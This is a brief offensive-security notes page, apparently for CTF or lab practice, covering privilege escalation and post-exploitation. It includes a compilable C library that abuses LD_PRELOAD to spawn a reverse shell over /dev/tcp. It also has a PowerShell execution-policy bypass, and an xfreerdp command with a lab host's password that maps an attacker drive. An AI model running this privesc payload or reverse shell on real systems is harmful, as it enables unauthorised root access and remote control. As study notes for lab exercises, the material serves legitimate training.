# Notes

> Reconncenc

If found id\_rsa make chmod 600 to access file

> Initial Access

> Privesc

* [ ] Find SUID Files like (u+s,g+s)
* [ ] in Linux/Unix Search in process running can find any  suspicious process like use **`systemctl list-units --type=service --all`**
* #### LD\_PRELOAD bypass <a href="#ld_preload-bypass" id="ld_preload-bypass"></a>

Here is a library you can compile to abuse the `LD_PRELOAD` env variable:

```c
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

uid_t getuid(void){
	unsetenv("LD_PRELOAD");
	system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
	return 1;
}
```

> Post-exploitation

* [ ] In Windows use Powershell -ep bypass then  use this command to get important files

```powershell
Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName
```

* [ ] if Port 3389 is Open try connect using rdesktop or xfreerdp and use /drive:.,kali-share to shere your partition on attacker Machine

{% code overflow="wrap" %}

```bash
xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share 
```

{% endcode %}